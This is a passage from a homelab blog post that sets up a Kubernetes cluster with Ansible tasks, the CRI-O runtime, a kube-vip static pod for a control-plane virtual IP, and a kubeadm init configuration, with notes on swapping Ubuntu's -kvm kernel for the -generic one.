</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">br_netfilter</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">persistent</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">enable ipv4 netfilter on bridge interfaces</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kernel</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.posix.sysctl</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">net.bridge.bridge-nf-call-iptables</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">enable ipv6 netfilter on bridge interfaces</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kernel</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.posix.sysctl</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">net.bridge.bridge-nf-call-ip6tables</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">enable ipv4 forwarding</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kernel</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.posix.sysctl</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">net.ipv4.ip_forward</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span></code></pre></div><p>This takes care of the pre-config. But if you&rsquo;re using the Ubuntu cloud image,
for example with LXD VMs, you also need to switch to a different kernel to
later be able to make use of Cilium as the CNI plugin.</p>
<h2 id="fun-with-ubuntus-cloud-images">Fun with Ubuntu&rsquo;s cloud images</h2>
<p>When I started up the cluster and went to install Cilium, its containers went
into a crash loop because the Ubuntu cloud image kernel, which is specialized
for use with e.g. KVM, does not have all the required kernel modules available. For me,
the kernel installed was <code>linux-image-kvm</code>. The Cilium docs have a <a href="https://docs.cilium.io/en/stable/operations/system_requirements/#base-requirements">page detailing
the required kernel config</a>.
I initially thought: Those will be fulfilled by any decently current kernel.
But I was wrong: the <code>-kvm</code> variant of Ubuntu&rsquo;s kernel seems to be lacking
some of the configs.</p>
<p>To fix this, I then needed to switch to the <code>-generic</code> kernel. Naively, I
again thought: How difficult could it possibly be? And I just ran
<code>apt remove linux-image-5.15.0-1039-kvm</code>. That did not have the hoped-for effect.
Instead, it tried to remove that image and then install <code>linux-image-unsigned-5.15.0-1039-kvm</code>,
which would not have been too useful. Finally, I followed <a href="https://discuss.linuxcontainers.org/t/usb-passthrough-on-ubuntu-based-vms/12170">this tutorial</a>, but decided to install the <code>-generic</code>
kernel, instead of the <code>-virtual</code> one.</p>
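<p>The gist of it, as a rough sketch (package names partly from memory, so double-check them against the tutorial): install the <code>-generic</code> kernel first, and only remove the <code>-kvm</code> packages afterwards.</p>
<pre tabindex="0"><code># Install the generic kernel before touching the -kvm one
apt install linux-image-generic
# Then remove the kvm-specific kernel packages and rebuild the boot config
apt purge linux-image-5.15.0-1039-kvm linux-modules-5.15.0-1039-kvm
update-grub
reboot
</code></pre>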
<h2 id="installing-and-setting-up-cri-o">Installing and setting up CRI-O</h2>
<p>As noted above, <a href="https://cri-o.io/">cri-o</a> is my container runtime of choice.
To install it, several additional APT repos need to be added. I will only show
the Ansible setup for one of them here. First, we need the public keys for the
repos, which I normally just download and then store in my Homelab repo. Before
storing the keys, you should pipe them through <code>gpg --dearmor</code>.</p>
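<p>For completeness, fetching and de-armoring such a key looks roughly like this (the URL is a placeholder for the actual repo key):</p>
<pre tabindex="0"><code># Fetch the ASCII-armored signing key and convert it into the binary keyring format
curl -fsSL https://example.org/Release.key | gpg --dearmor -o libcontainers-crio-keyring.gpg
</code></pre>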
<p>Setting up the keys then simply means copying them into the right directory,
where apt can find them:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add libcontainers cri-o repo key</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">crio</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">src</span>: <span style="color:#ae81ff">libcontainers-crio-keyring.gpg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/usr/share/keyrings/libcontainers-crio-keyring.gpg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#ae81ff">0644</span>
</span></span></code></pre></div><p>Once that&rsquo;s done, we can set up the actual repo:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add libcontainers cri-o ubuntu repo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">crio</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apt_repository</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">repo</span>: &gt;<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      deb [signed-by=/usr/share/keyrings/libcontainers-crio-keyring.gpg]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      https://download.opensuse.org/repositories/devel:/kubic:/libcontainers:/stable:/cri-o:/1.27/xUbuntu_22.04/ /</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">filename</span>: <span style="color:#ae81ff">libcontainers-crio</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">register</span>: <span style="color:#ae81ff">libcontainers_ubuntu_repo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">ansible_facts[&#39;distribution&#39;] == &#39;Ubuntu&#39;</span>
</span></span></code></pre></div><p>As you can see, I&rsquo;m only adding the specific Ubuntu repo if the distribution
actually is Ubuntu.
Please note that I&rsquo;ve only shown one additional repo, but there&rsquo;s another one
which needs to be added in a similar way.</p>
<p>Finally, we can install cri-o:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">create cri-o config dir</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">crio</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.file</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/crio</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">directory</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;755&#39;</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">install cri-o config file</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">crio</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.copy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/crio/crio.conf</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">src</span>: <span style="color:#ae81ff">crio.conf</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;644&#39;</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">install cri-o</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">crio</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.apt</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">cri-o</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">cri-o-runc</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">autostart cri-o</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">crio</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.systemd_service</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">crio</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">started</span>
</span></span></code></pre></div><p>One weird thing which tripped me up in the beginning was that cri-o needs <code>runc</code>,
but it doesn&rsquo;t come with a dependency on <code>cri-o-runc</code>.</p>
<p>The config file I&rsquo;m using for cri-o is pretty simple, as <a href="https://github.com/cri-o/cri-o/blob/main/docs/crio.conf.5.md">the defaults</a> were mostly fine for me.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-toml" data-lang="toml"><span style="display:flex;"><span>[<span style="color:#a6e22e">crio</span>.<span style="color:#a6e22e">runtime</span>]
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">cgroup_manager</span> = <span style="color:#e6db74">&#34;systemd&#34;</span>
</span></span></code></pre></div><p>So at least for now, I just make sure that <code>systemd</code> is set as the cgroup
manager, as the container runtime&rsquo;s and the kubelet&rsquo;s cgroup drivers need to match.</p>
<h2 id="installing-the-kubernetes-tools">Installing the Kubernetes tools</h2>
<p>Finally, we need to install a couple of Kubernetes tools. First, similar to above,
we need to add the Kubernetes APT repo at <code>pkgs.k8s.io</code> (a sketch of that repo
definition follows at the end of this section). Then we can install the three
necessary Kubernetes tools:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">install kubernetes tools</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.apt</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">kubelet</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">kubeadm</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">kubectl</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>In addition to installing the tools, they should also be pinned to their
installed versions, as the Kubernetes tools should not be updated as part of a
random system package update, but only during a deliberate cluster upgrade:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pin kubelet version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dpkg_selections</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubelet</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selection</span>: <span style="color:#ae81ff">hold</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pin kubeadm version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dpkg_selections</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubeadm</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selection</span>: <span style="color:#ae81ff">hold</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pin kubectl version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dpkg_selections</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubectl</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selection</span>: <span style="color:#ae81ff">hold</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">autostart kubelet</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubelet</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.systemd_service</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubelet</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>At the end, I&rsquo;m also making sure that the kubelet is auto-started.</p>
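<p>And here is the promised sketch of the Kubernetes repo definition. The keyring name
and the <code>v1.28</code> minor version are placeholders: pkgs.k8s.io provides one repo per
Kubernetes minor release, and its key needs to be dearmored and copied just like the
cri-o one above:</p>
<pre tabindex="0"><code>- name: add kubernetes apt repo
  tags:
    - kubernetes
  apt_repository:
    repo: &gt;
      deb [signed-by=/usr/share/keyrings/kubernetes-apt-keyring.gpg]
      https://pkgs.k8s.io/core:/stable:/v1.28/deb/ /
    state: present
    filename: kubernetes
</code></pre>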
<h2 id="setting-up-kube-vip-as-a-load-balancer-for-the-control-plane">Setting up kube-vip as a load balancer for the control plane</h2>
<p>If you want an HA control plane with Kubernetes, you need a load balancer to
distribute requests to the Kubernetes API endpoint across the three control plane
instances.</p>
<p>Luckily, you don&rsquo;t need to migrate your Homelab into a cloud to make this work.
Through some helpful comments on the Fediverse, I was pointed towards the
<a href="https://kube-vip.io/">kube-vip</a> app. It provides a virtual IP for the control
plane, notably the Kubernetes API server. In my setup, I ran it as a static
pod, as I liked the idea of tying it to the kubelet, instead of running it
standalone.</p>
<p>To do so, I put the following static pod config file into <code>/etc/kubernetes/manifests/kube-vip.yaml</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Pod</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">creationTimestamp</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-vip</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">manager</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_arp</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bgp_enable</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;false&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">port</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;6443&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_cidr</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;32&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cp_enable</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">svc_enable</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;false&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cp_namespace</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_ddns</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;false&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_leaderelection</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_leasename</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">plndr-cp-lock</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_leaseduration</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;5&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_renewdeadline</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;3&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vip_retryperiod</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">address</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">10.12.0.100</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">prometheus_server</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: :<span style="color:#ae81ff">2112</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">ghcr.io/kube-vip/kube-vip:v0.6.2</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">imagePullPolicy</span>: <span style="color:#ae81ff">Always</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-vip</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>: {}
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">add</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">NET_ADMIN</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">NET_RAW</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/etc/kubernetes/admin.conf</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubeconfig</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hostAliases</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">hostnames</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ip</span>: <span style="color:#ae81ff">127.0.0.1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hostNetwork</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">hostPath</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/kubernetes/admin.conf</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubeconfig</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">status</span>: {}
</span></span></code></pre></div><p>Most of these options should be relatively clear. More information can be found
in the <a href="https://kube-vip.io/docs/installation/flags/">docs</a>.
Important to note are the
<code>vip_arp</code> and <code>bgp_enable</code> options. These configure how the address is made
known. Because I&rsquo;m definitely not a networking wizard, I went with the simpler
ARP-based approach.</p>
<p>Also worth noting is that I disabled the <code>svc_enable</code> option, which can be
switched on to allow kube-vip to act as a <code>LoadBalancer</code> for Kubernetes services
of that type. To reduce initial complexity, I will be working with ClusterIP and
NodePort services for now and look at LoadBalancer type services later again,
including things like MetalLB.</p>
<p>The final and most important config is <code>address</code>. It determines which virtual IP
address kube-vip will advertise. In my case, I also added a DNS name for that IP
into my authoritative DNS server for easier access.</p>
<p>Kube-vip should be a static pod, so it can
run (more or less) outside Kubernetes. In my setup, this is necessary because
I will point <code>kubeadm</code> towards the virtual IP during the setup of the actual
cluster, so kube-vip needs to work before the cluster is actually up and
running.</p>
<h1 id="initializing-the-cluster">Initializing the cluster</h1>
<p>All preparations finally complete, it&rsquo;s time to get ourselves a Kubernetes
cluster. As I&rsquo;ve noted above, I&rsquo;m using vanilla k8s with <strong>kubeadm</strong>. There
are two ways to initialize the cluster and add additional nodes. First,
using the command line. Second, using a kubeadm init config file.
I will be going with the config file approach, to be able to put the
initialization under version control.</p>
<p>Generally speaking, command line flags and config files cannot be mixed at
the moment.</p>
<p>The documentation for the init config file can be found <a href="https://kubernetes.io/docs/reference/config-api/kubeadm-config.v1beta3/#kubeadm-k8s-io-v1beta3-InitConfiguration">here</a>.</p>
<p>There is no default location for the config file, so I just put them alongside
all of the other Kubernetes configs under <code>/etc/kubernetes</code>.</p>
<p>And here is my init config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">kubeadm.k8s.io/v1beta3</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">InitConfiguration</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">skipPhases</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;addon/kube-proxy&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">nodeRegistration</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kubeletExtraArgs</span>:
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% if &#39;kube_ceph&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab.role=ceph&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% elif &#39;kube_controllers&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab.role=controller&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% elif &#39;kube_workers&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab.role=worker&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% endif %}</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">kubeadm.k8s.io/v1beta3</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterConfiguration</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">networking</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">podSubnet</span>: <span style="color:#e6db74">&#34;10.20.0.0/16&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceSubnet</span>: <span style="color:#e6db74">&#34;10.21.0.0/16&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">controlPlaneEndpoint</span>: <span style="color:#e6db74">&#34;api.k8s.example.com:6443&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiServer</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">timeoutForControlPlane</span>: <span style="color:#ae81ff">4m0s</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraArgs</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">authorization-mode</span>: <span style="color:#e6db74">&#34;Node,RBAC&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">controllerManager</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraArgs</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">allocate-node-cidrs</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">clusterName</span>: <span style="color:#e6db74">&#34;exp-cluster&#34;</span>
